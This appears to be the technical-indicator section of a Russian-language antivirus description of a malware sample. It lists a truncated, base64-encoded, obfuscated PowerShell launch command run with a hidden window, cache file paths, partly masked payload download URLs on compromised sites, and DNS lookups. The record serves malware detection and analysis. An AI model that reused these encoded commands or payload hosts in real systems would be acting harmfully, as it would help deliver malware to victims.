Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAE0AUgBPAE8AegBnAG0APQAnAEsATABOAEQAVgBkAG0AZgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAGAAVQBSAEkAVABZAHAAcgBgAE8AdABPAGMAbwBMACIAIAA9AC...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://te###civil.com/wp-content/wvr/
- http://sc####agazines.com/wp-content/uploads/2020/sEsCvKF/
- http://be###ads.com/wp-admin/PbgJVpz/
- http://si###batam.com/cgi-bin/5yq6g129/
- DNS ASK sa###time.com
- DNS ASK te###civil.com
- DNS ASK sc####agazines.com
- DNS ASK be###ads.com
- DNS ASK si###batam.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAE0AUgBPAE8AegBnAG0APQAnAEsATABOAEQAVgBkAG0AZgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAGAAVQBSAEkAVABZAHAAcgBgAE8AdABPAGMAbwBMACIAIAA9AC...' (со скрытым окном)